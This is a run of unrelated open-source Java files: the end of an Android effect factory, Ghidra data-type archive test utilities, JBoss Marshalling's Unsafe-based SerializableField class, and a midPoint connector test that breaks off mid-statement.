RuntimeException("The effect class '" + effectClass + "' does not have " + "the required constructor.", e); } // Construct the effect Effect effect = null; try { effect = (Effect)effectConstructor.newInstance(mEffectContext, name); } catch (Throwable t) { throw new RuntimeException("There was an error constructing the effect '" + effectClass + "'!", t); } return effect; } }
/* ### * IP: GHIDRA * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package ghidra.app.plugin.core.datamgr; import java.io.File; import java.io.IOException; import javax.swing.SwingUtilities; import docking.ActionContext; import docking.action.DockingActionIf; import docking.widgets.tree.GTree; import docking.widgets.tree.GTreeNode; import generic.test.AbstractGenericTest; import ghidra.app.plugin.core.datamgr.archive.*; import ghidra.app.plugin.core.datamgr.tree.ArchiveNode; import ghidra.app.plugin.core.datamgr.tree.DataTypeArchiveGTree; import ghidra.program.model.data.*; import ghidra.program.model.listing.Program; import ghidra.util.Msg; import ghidra.util.Swing; import ghidra.util.task.TaskMonitor; import utilities.util.FileUtilities; public class DataTypeTestUtils { private static final String ARCHIVE_FILE_EXTENSION = FileDataTypeManager.SUFFIX; private static File tempArchiveDir; static DataTypeArchiveGTree archiveTree; private DataTypeTestUtils() { // utils class } private static File getTempDir() throws IOException { if (tempArchiveDir == null) { tempArchiveDir = AbstractGenericTest.createTempDirectory("archive.db.dir"); } return tempArchiveDir; } // copies the default test archive into a local version public static File createArchive(String filename) throws Exception { return createLocalArchiveFromExistingArchive(filename, "TestArchive.gdt"); } // copies the archive from the given filename to a local version public static File copyArchive(String filename) throws Exception { return createLocalArchiveFromExistingArchive(filename, filename); } private static File createLocalArchiveFromExistingArchive(String filename, String existingFilename) throws Exception { File tempDir = getTempDir(); File scratchFile = new File(tempDir, filename); if (scratchFile.exists()) { scratchFile.delete(); } File packedDbFile = AbstractGenericTest.getTestDataFile(existingFilename); if (packedDbFile == null) { Msg.debug(DataTypeTestUtils.class, "No packed DB file named '" + existingFilename + "'"); return null; } // copy the archive DB file to avoid lock contention in parallel testing File tempDbFile = new File(tempDir, "copy." + existingFilename); tempDbFile.deleteOnExit(); FileUtilities.copyFile(packedDbFile, tempDbFile, false, TaskMonitor.DUMMY); boolean openForUpdate = true; // open for update to allow auto-upgrade to occur if needed FileDataTypeManager fm = FileDataTypeManager.openFileArchive(tempDbFile, openForUpdate); fm.saveAs(scratchFile); fm.close(); Msg.debug(DataTypeTestUtils.class, "Created test archive: " + scratchFile); return scratchFile; } public static ArchiveNode openArchive(String archiveDirPath, String archiveName, boolean checkout, DataTypeManagerPlugin plugin) throws Exception { File file = new File(archiveDirPath, archiveName); DataTypeManagerHandler dataTypeManagerHandler = plugin.getDataTypeManagerHandler(); // this opens the archive and triggers the tree to rebuild dataTypeManagerHandler.openArchive(file, checkout, false); waitForTree(plugin); GTree tree = plugin.getProvider().getGTree(); GTreeNode rootNode = tree.getModelRoot(); return (ArchiveNode) rootNode.getChild(trimFullArchiveName(archiveName)); } public static ArchiveNode openArchive(String archiveName, boolean checkout, DataTypeManagerPlugin plugin) throws Exception { ArchiveNode openArchive = openArchive(archiveName, checkout, false, plugin); waitForTree(plugin); return openArchive; } private static void waitForTree(DataTypeManagerPlugin plugin) { GTree tree = plugin.getProvider().getGTree(); while (tree.isBusy()) { try { Thread.sleep(50); } catch (Exception e) { // who cares? } } AbstractGenericTest.waitForPostedSwingRunnables(); } public static ArchiveNode openArchive(String archiveName, boolean checkout, boolean isUserAction, DataTypeManagerPlugin plugin) throws Exception { File tempDir = getTempDir(); File file = new File(tempDir, archiveName); DataTypeManagerHandler dataTypeManagerHandler = plugin.getDataTypeManagerHandler(); // this opens the archive and triggers the tree to rebuild dataTypeManagerHandler.openArchive(file, checkout, isUserAction); archiveTree = plugin.getProvider().getGTree(); GTreeNode rootNode = archiveTree.getViewRoot(); waitForTree(plugin); return (ArchiveNode) rootNode.getChild(trimFullArchiveName(archiveName)); } public static void closeArchive(final ArchiveNode archiveNode, final boolean deleteFile) throws Exception { Exception exception = Swing.runNow(() -> { try { doCloseArchive(archiveNode, deleteFile); return null; } catch (Exception e) { return e; } }); if (exception != null) { throw new RuntimeException("Exception closing archive on Swing thread!: ", exception); } } private static void doCloseArchive(ArchiveNode archiveNode, boolean deleteFile) throws Exception { if (archiveNode == null) { return; } Archive archive = archiveNode.getArchive(); File file = null; if ((archive instanceof FileArchive) && deleteFile) { file = ((FileArchive) archive).getFile().getFile(false); } archiveNode.getArchive().close(); if (file != null) { FileDataTypeManager.delete(file); } } /** * Checks out the archive by the given name. * * @param archiveName The name of the archive to open. This must be a child off of the root node. * @param plugin The plugin that contains the tree and actions under test * @return The archive node associated with the open archive * @throws Exception If there is any problem finding or opening the archive for the given name */ public static ArchiveNode checkOutArchive(String archiveName, final DataTypeManagerPlugin plugin) throws Exception { String archiveNodeName = trimFullArchiveName(archiveName); GTree tree = plugin.getProvider().getGTree(); GTreeNode rootNode = tree.getModelRoot(); ArchiveNode archiveNode = (ArchiveNode) rootNode.getChild(archiveNodeName); if (archiveNode == null) { throw new IllegalArgumentException( "Unable to locate an archive by the name: " + archiveNodeName); } ArchiveUtils.lockArchive((FileArchive) archiveNode.getArchive()); // checking out the archive causes the trees nodes to be recreated return (ArchiveNode) rootNode.getChild(archiveNodeName); } /** * Trims the given string if it ends with {@link #ARCHIVE_FILE_EXTENSION}. * @param archiveName The name to trim * @return The original name, trimmed as necessary */ private static String trimFullArchiveName(String archiveName) { if (archiveName.endsWith(ARCHIVE_FILE_EXTENSION)) { int endIndex = archiveName.indexOf(ARCHIVE_FILE_EXTENSION); return archiveName.substring(0, endIndex); } return archiveName; } public static ArchiveNode createOpenAndCheckoutArchive(String archiveName, DataTypeManagerPlugin plugin) throws Exception { createArchive(archiveName); return openArchive(archiveName, true, plugin); } public static ArchiveNode copyOpenAndCheckoutArchive(String archiveName, DataTypeManagerPlugin plugin) throws Exception { copyArchive(archiveName); return openArchive(archiveName, true, plugin); } public static void performAction(DockingActionIf action, Program program, GTree tree) { performAction(action, program, tree, true); } public static void performAction(DockingActionIf action, Program program, GTree tree, boolean wait) { AbstractGenericTest.runSwing(() -> { ActionContext context = new DataTypesActionContext(null, program, (DataTypeArchiveGTree) tree, null, true); action.actionPerformed(context); }, wait); if (!SwingUtilities.isEventDispatchThread()) { AbstractGenericTest.waitForSwing(); } } public static void performAction(DockingActionIf action, GTree tree) { performAction(action, tree, true); } public static void performAction(DockingActionIf action, GTree tree, boolean wait) { AbstractGenericTest.runSwing(() -> { ActionContext context = new DataTypesActionContext(null, null, (DataTypeArchiveGTree) tree, null, true); action.actionPerformed(context); }, wait); if (!SwingUtilities.isEventDispatchThread()) { AbstractGenericTest.waitForSwing(); } } public static void createCategory(Category parent, String categoryName) throws Exception { DataTypeManager dtm = parent.getDataTypeManager(); int id = dtm.startTransaction("create category"); try { parent.createCategory(categoryName); } finally { dtm.endTransaction(id, true); } } }
/* * JBoss, Home of Professional Open Source. * Copyright 2014 Red Hat, Inc., and individual contributors * as indicated by the @author tags. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.jboss.marshalling.reflect; import static java.lang.System.getSecurityManager; import static java.security.AccessController.doPrivileged; import java.io.IOException; import java.io.ObjectInput; import java.io.ObjectOutput; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import org.jboss.marshalling._private.GetUnsafeAction; import org.jboss.marshalling.util.Kind; import sun.misc.Unsafe; /** * Reflection information about a field on a serializable class. */ public final class SerializableField { static final Unsafe unsafe = getSecurityManager() == null ? GetUnsafeAction.INSTANCE.run() : doPrivileged(GetUnsafeAction.INSTANCE); // the type of the field itself private final Class<?> type; private final Field field; private final String name; private final boolean unshared; private final Kind kind; private final long fieldOffset; public SerializableField(Class<?> type, String name, boolean unshared) { this(type, name, unshared, null); } SerializableField(Class<?> type, String name, boolean unshared, final Field field) { assert field == null || (field.getModifiers() & Modifier.STATIC) == 0 && ! field.getDeclaringClass().isArray(); this.type = type; this.name = name; this.unshared = unshared; this.field = field; fieldOffset = field == null ? -1 : unsafe.objectFieldOffset(field); if (field != null) { // verify field information if (field.getType() != type) { throw new IllegalStateException("Constructed a serializable field with the wrong type (field type is " + field.getType() + ", our type is " + type + ")"); } if (! field.getName().equals(name)) { throw new IllegalStateException("Constructed a serializable field with the wrong name (field name is " + field.getName() + ", our name is " + name + ")"); } } // todo - see if a small Map is faster if (type == boolean.class) { kind = Kind.BOOLEAN; } else if (type == byte.class) { kind = Kind.BYTE; } else if (type == short.class) { kind = Kind.SHORT; } else if (type == int.class) { kind = Kind.INT; } else if (type == long.class) { kind = Kind.LONG; } else if (type == char.class) { kind = Kind.CHAR; } else if (type == float.class) { kind = Kind.FLOAT; } else if (type == double.class) { kind = Kind.DOUBLE; } else { kind = Kind.OBJECT; } } /** * Get the reflection {@code Field} for this serializable field. The resultant field will be accessible. * * @return the reflection field * @deprecated As of Java 9, accessible fields are generally disallowed; use the {@code #setXXX(Object,value)} methods instead. */ @Deprecated public Field getField() { return field; } /** * Determine if this object may be used to get or set an object field value. * * @return {@code true} if this object may be used to get or set an object field value, {@code false} otherwise */ public boolean isAccessible() { return field != null; } /** * Get the name of the field. * * @return the name */ public String getName() { return name; } /** * Determine whether this field is marked as "unshared". * * @return {@code true} if the field is unshared */ public boolean isUnshared() { return unshared; } /** * Get the kind of field. * * @return the kind */ public Kind getKind() { return kind; } /** * Get the field type. * * @return the field type */ public Class<?> getType() throws ClassNotFoundException { return type; } /** * Set the boolean value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @param value the value to set * @throws ClassCastException if {@code instance} or the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public void setBoolean(Object instance, boolean value) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != boolean.class) { throw new ClassCastException(); } unsafe.putBoolean(instance, fieldOffset, value); } /** * Set the char value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @param value the value to set * @throws ClassCastException if {@code instance} or the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public void setChar(Object instance, char value) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != char.class) { throw new ClassCastException(); } unsafe.putChar(instance, fieldOffset, value); } /** * Set the byte value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @param value the value to set * @throws ClassCastException if {@code instance} is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public void setByte(Object instance, byte value) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != byte.class) { throw new ClassCastException(); } unsafe.putByte(instance, fieldOffset, value); } /** * Set the short value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @param value the value to set * @throws ClassCastException if {@code instance} or the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public void setShort(Object instance, short value) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != short.class) { throw new ClassCastException(); } unsafe.putShort(instance, fieldOffset, value); } /** * Set the integer value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @param value the value to set * @throws ClassCastException if {@code instance} or the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public void setInt(Object instance, int value) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != int.class) { throw new ClassCastException(); } unsafe.putInt(instance, fieldOffset, value); } /** * Set the long value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @param value the value to set * @throws ClassCastException if {@code instance} or the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public void setLong(Object instance, long value) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != long.class) { throw new ClassCastException(); } unsafe.putLong(instance, fieldOffset, value); } /** * Set the float value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @param value the value to set * @throws ClassCastException if {@code instance} or the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public void setFloat(Object instance, float value) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != float.class) { throw new ClassCastException(); } unsafe.putFloat(instance, fieldOffset, value); } /** * Set the double value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @param value the value to set * @throws ClassCastException if {@code instance} or the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public void setDouble(Object instance, double value) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != double.class) { throw new ClassCastException(); } unsafe.putDouble(instance, fieldOffset, value); } /** * Set the object value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @param value the value to set * @throws ClassCastException if {@code instance} or the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public void setObject(Object instance, Object value) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); final Class<?> fieldType = field.getType(); if (fieldType.isPrimitive()) { throw new ClassCastException(); } fieldType.cast(value); unsafe.putObject(instance, fieldOffset, value); } /** * Get the boolean value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public boolean getBoolean(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != boolean.class) { throw new ClassCastException(); } return unsafe.getBoolean(instance, fieldOffset); } /** * Get the char value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public char getChar(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != char.class) { throw new ClassCastException(); } return unsafe.getChar(instance, fieldOffset); } /** * Get the byte value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public byte getByte(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != byte.class) { throw new ClassCastException(); } return unsafe.getByte(instance, fieldOffset); } /** * Get the short value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public short getShort(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != short.class) { throw new ClassCastException(); } return unsafe.getShort(instance, fieldOffset); } /** * Get the integer value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public int getInt(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != int.class) { throw new ClassCastException(); } return unsafe.getInt(instance, fieldOffset); } /** * Get the long value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public long getLong(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != long.class) { throw new ClassCastException(); } return unsafe.getLong(instance, fieldOffset); } /** * Get the float value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public float getFloat(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != float.class) { throw new ClassCastException(); } return unsafe.getFloat(instance, fieldOffset); } /** * Get the double value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public double getDouble(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType() != double.class) { throw new ClassCastException(); } return unsafe.getDouble(instance, fieldOffset); } /** * Get the object value of this field on the given object instance. * * @param instance the object instance (must not be {@code null}, must be of the correct type) * @return the value of the field * @throws ClassCastException if the field is not of the correct type * @throws IllegalArgumentException if this instance has no reflection field set on it */ public Object getObject(Object instance) throws ClassCastException, IllegalArgumentException { if (instance == null) { throw new IllegalArgumentException("instance is null"); } if (field == null) { throw new IllegalArgumentException(); } field.getDeclaringClass().cast(instance); if (field.getType().isPrimitive()) { throw new ClassCastException(); } return unsafe.getObject(instance, fieldOffset); } /** * Read the field value from the stream. * * @param instance the instance * @param input the source stream * @throws IOException if an I/O error occurs * @throws ClassNotFoundException if a class could not be loaded */ public void readFrom(Object instance, ObjectInput input) throws IOException, ClassNotFoundException { switch (kind) { case BOOLEAN: setBoolean(instance, input.readBoolean()); break; case BYTE: setByte(instance, input.readByte()); break; case CHAR: setChar(instance, input.readChar()); break; case DOUBLE: setDouble(instance, input.readDouble()); break; case FLOAT: setFloat(instance, input.readFloat()); break; case INT: setInt(instance, input.readInt()); break; case LONG: setLong(instance, input.readLong()); break; case SHORT: setShort(instance, input.readShort()); break; case OBJECT: setObject(instance, input.readObject()); break; default: throw new IllegalStateException(); } } public void writeTo(Object instance, ObjectOutput output) throws IOException { switch (kind) { case BOOLEAN: output.writeBoolean(getBoolean(instance)); break; case BYTE: output.writeByte(getByte(instance)); break; case CHAR: output.writeChar(getChar(instance)); break; case DOUBLE: output.writeDouble(getDouble(instance)); break; case FLOAT: output.writeFloat(getFloat(instance)); break; case INT: output.writeInt(getInt(instance)); break; case LONG: output.writeLong(getLong(instance)); break; case SHORT: output.writeShort(getShort(instance)); break; case OBJECT: output.writeObject(getObject(instance)); break; default: throw new IllegalStateException(); } } }
/* * Copyright (c) 2010-2016 Evolveum * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.evolveum.midpoint.provisioning.impl.ucf; import static com.evolveum.midpoint.test.IntegrationTestTools.display; import static org.testng.AssertJUnit.assertEquals; import static org.testng.AssertJUnit.assertFalse; import static org.testng.AssertJUnit.assertNotNull; import java.util.ArrayList; import java.util.Collection; import java.util.List; import org.springframework.test.context.ContextConfiguration; import org.testng.annotations.Test; import com.evolveum.icf.dummy.resource.DummyAccount; import com.evolveum.midpoint.prism.PrismContainerDefinition; import com.evolveum.midpoint.prism.PrismContainerValue; import com.evolveum.midpoint.prism.PrismObject; import com.evolveum.midpoint.prism.query.ObjectQuery; import com.evolveum.midpoint.prism.schema.PrismSchema; import com.evolveum.midpoint.prism.schema.SchemaRegistry; import com.evolveum.midpoint.prism.util.PrismTestUtil; import com.evolveum.midpoint.provisioning.ucf.api.GenericFrameworkException; import com.evolveum.midpoint.provisioning.ucf.api.ResultHandler; import com.evolveum.midpoint.provisioning.ucf.impl.ConnectorFactoryIcfImpl; import com.evolveum.midpoint.schema.processor.ObjectClassComplexTypeDefinition; import com.evolveum.midpoint.schema.processor.ResourceAttribute; import com.evolveum.midpoint.schema.processor.ResourceAttributeContainer; import com.evolveum.midpoint.schema.result.OperationResult; import com.evolveum.midpoint.schema.statistics.ConnectorOperationalStatus; import com.evolveum.midpoint.schema.util.ResourceTypeUtil; import com.evolveum.midpoint.schema.util.ShadowUtil; import com.evolveum.midpoint.test.util.TestUtil; import com.evolveum.midpoint.util.exception.CommunicationException; import com.evolveum.midpoint.util.exception.ObjectNotFoundException; import com.evolveum.midpoint.util.exception.SchemaException; import com.evolveum.midpoint.util.exception.SecurityViolationException; import com.evolveum.midpoint.util.logging.Trace; import com.evolveum.midpoint.util.logging.TraceManager; import com.evolveum.midpoint.xml.ns._public.common.common_3.ConnectorConfigurationType; import com.evolveum.midpoint.xml.ns._public.common.common_3.ObjectReferenceType; import com.evolveum.midpoint.xml.ns._public.common.common_3.ShadowKindType; import com.evolveum.midpoint.xml.ns._public.common.common_3.ShadowType; /** * UCF test with dummy resource and several connector instances. * * @author Radovan Semancik */ @ContextConfiguration(locations = { "classpath:ctx-provisioning-test-no-repo.xml" }) public class TestUcfDummyMulti extends AbstractUcfDummyTest { private static Trace LOGGER = TraceManager.getTrace(TestUcfDummyMulti.class); @Test public void test000PrismContextSanity() throws Exception { final String TEST_NAME = "test000PrismContextSanity"; TestUtil.displayTestTile(TEST_NAME); SchemaRegistry schemaRegistry = PrismTestUtil.getPrismContext().getSchemaRegistry(); PrismSchema schemaIcfc = schemaRegistry.findSchemaByNamespace(ConnectorFactoryIcfImpl.NS_ICF_CONFIGURATION); assertNotNull("ICFC schema not found in the context ("+ConnectorFactoryIcfImpl.NS_ICF_CONFIGURATION+")", schemaIcfc); PrismContainerDefinition<ConnectorConfigurationType> configurationPropertiesDef = schemaIcfc.findContainerDefinitionByElementName(ConnectorFactoryIcfImpl.CONNECTOR_SCHEMA_CONFIGURATION_PROPERTIES_ELEMENT_QNAME); assertNotNull("icfc:configurationProperties not found in icfc schema ("+ ConnectorFactoryIcfImpl.CONNECTOR_SCHEMA_CONFIGURATION_PROPERTIES_ELEMENT_QNAME+")", configurationPropertiesDef); PrismSchema schemaIcfs = schemaRegistry.findSchemaByNamespace(ConnectorFactoryIcfImpl.NS_ICF_SCHEMA); assertNotNull("ICFS schema not found in the context ("+ConnectorFactoryIcfImpl.NS_ICF_SCHEMA+")", schemaIcfs); } @Test public void test020CreateConfiguredConnector() throws Exception { final String TEST_NAME = "test020CreateConfiguredConnector"; TestUtil.displayTestTile(TEST_NAME); cc = connectorFactory.createConnectorInstance(connectorType, ResourceTypeUtil.getResourceNamespace(resourceType), "test connector"); assertNotNull("Failed to instantiate connector", cc); OperationResult result = new OperationResult(TestUcfDummyMulti.class.getName() + "." + TEST_NAME); PrismContainerValue<ConnectorConfigurationType> configContainer = resourceType.getConnectorConfiguration().asPrismContainerValue(); display("Configuration container", configContainer); // WHEN cc.configure(configContainer, result); // THEN result.computeStatus(); TestUtil.assertSuccess(result); resourceSchema = cc.fetchResourceSchema(null, result); assertNotNull("No resource schema", resourceSchema); } @Test public void test100AddAccount() throws Exception { final String TEST_NAME = "test100AddAccount"; TestUtil.displayTestTile(this, TEST_NAME); OperationResult result = new OperationResult(this.getClass().getName() + "." + TEST_NAME); ObjectClassComplexTypeDefinition defaultAccountDefinition = resourceSchema.findDefaultObjectClassDefinition(ShadowKindType.ACCOUNT); ShadowType shadowType = new ShadowType(); PrismTestUtil.getPrismContext().adopt(shadowType); shadowType.setName(PrismTestUtil.createPolyStringType(ACCOUNT_JACK_USERNAME)); ObjectReferenceType resourceRef = new ObjectReferenceType(); resourceRef.setOid(resource.getOid()); shadowType.setResourceRef(resourceRef); shadowType.setObjectClass(defaultAccountDefinition.getTypeName()); PrismObject<ShadowType> shadow = shadowType.asPrismObject(); ResourceAttributeContainer attributesContainer = ShadowUtil.getOrCreateAttributesContainer(shadow, defaultAccountDefinition); ResourceAttribute<String> icfsNameProp = attributesContainer.findOrCreateAttribute(ConnectorFactoryIcfImpl.ICFS_NAME); icfsNameProp.setRealValue(ACCOUNT_JACK_USERNAME); // WHEN cc.addObject(shadow, null, null, result); // THEN DummyAccount dummyAccount = dummyResource.getAccountByUsername(ACCOUNT_JACK_USERNAME); assertNotNull("Account "+ACCOUNT_JACK_USERNAME+" was not created", dummyAccount); assertNotNull("Account "+ACCOUNT_JACK_USERNAME+" has no username", dummyAccount.getName()); } @Test public void test110SearchNonBlocking() throws Exception { final String TEST_NAME = "test100SearchNonBlocking"; TestUtil.displayTestTile(TEST_NAME); // GIVEN final ObjectClassComplexTypeDefinition accountDefinition = resourceSchema.findDefaultObjectClassDefinition(ShadowKindType.ACCOUNT); // Determine object class from the schema final List<PrismObject<ShadowType>> searchResults = new ArrayList<PrismObject<ShadowType>>(); ResultHandler<ShadowType> handler = new ResultHandler<ShadowType>() { @Override public boolean handle(PrismObject<ShadowType> shadow) { System.out.println("Search: found: " + shadow); checkUcfShadow(shadow, accountDefinition); searchResults.add(shadow); return true; } }; OperationResult result = new OperationResult(this.getClass().getName() + "." + TEST_NAME); // WHEN cc.search(accountDefinition, new ObjectQuery(), handler, null, null, null, null, result); // THEN assertEquals("Unexpected number of search results", 1, searchResults.size()); ConnectorOperationalStatus opStat = cc.getOperationalStatus(); display("stats", opStat); assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumActive()); assertEquals("Wrong pool active", (Integer)1, opStat.getPoolStatusNumIdle()); } @Test public void test200BlockingSearch() throws Exception { final String TEST_NAME = "test200BlockingSearch"; TestUtil.displayTestTile(TEST_NAME); // GIVEN final OperationResult result = new OperationResult(this.getClass().getName() + "." + TEST_NAME); final ObjectClassComplexTypeDefinition accountDefinition = resourceSchema.findDefaultObjectClassDefinition(ShadowKindType.ACCOUNT); // Determine object class from the schema final List<PrismObject<ShadowType>> searchResults = new ArrayList<PrismObject<ShadowType>>(); final ResultHandler<ShadowType> handler = new ResultHandler<ShadowType>() { @Override public boolean handle(PrismObject<ShadowType> shadow) { checkUcfShadow(shadow, accountDefinition); searchResults.add(shadow); return true; } }; dummyResource.setBlockOperations(true); // WHEN Thread t = new Thread(new Runnable() { @Override public void run() { try { cc.search(accountDefinition, new ObjectQuery(), handler, null, null, null, null, result); } catch (CommunicationException | GenericFrameworkException | SchemaException | SecurityViolationException | ObjectNotFoundException e) { LOGGER.error("Error in the search: {}", e.getMessage(), e); } } }); t.setName("search1"); t.start(); // Give the new thread a chance to get blocked Thread.sleep(500); ConnectorOperationalStatus opStat = cc.getOperationalStatus(); display("stats (blocked)", opStat); assertEquals("Wrong pool active", (Integer)1, opStat.getPoolStatusNumActive()); assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumIdle()); assertEquals("Unexpected number of search results", 0, searchResults.size()); dummyResource.unblock(); t.join(); dummyResource.setBlockOperations(false); // THEN assertEquals("Unexpected number of search results", 1, searchResults.size()); opStat = cc.getOperationalStatus(); display("stats (final)", opStat); assertEquals("Wrong pool active", (Integer)0, opStat.getPoolStatusNumActive()); assertEquals("Wrong pool active", (Integer)1, opStat.getPoolStatusNumIdle()); PrismObject<ShadowType> searchResult = searchResults.get(0); display("Search result", searchResult); } @Test public void test210TwoBlockingSearches() throws Exception { final String TEST_NAME = "test210TwoBlockingSearches"; TestUtil.displayTestTile(TEST_NAME); // GIVEN final ObjectClassComplexTypeDefinition accountDefinition = resourceSchema.findDefaultObjectClassDefinition(ShadowKindType.ACCOUNT); // Determine object class from the schema final OperationResult result1 = new OperationResult(this.getClass().getName() + "." + TEST_NAME); final List<PrismObject<ShadowType>> searchResults1 = new ArrayList<PrismObject<ShadowType>>(); final ResultHandler<ShadowType> handler1 = new ResultHandler<ShadowType>() { @Override public boolean handle(PrismObject<ShadowType> shadow) { checkUcfShadow(shadow, accountDefinition); searchResults1.add(shadow); return true; } }; final OperationResult result2 = new OperationResult(this.getClass().getName() + "." + TEST_NAME); final List<PrismObject<ShadowType>> searchResults2 = new 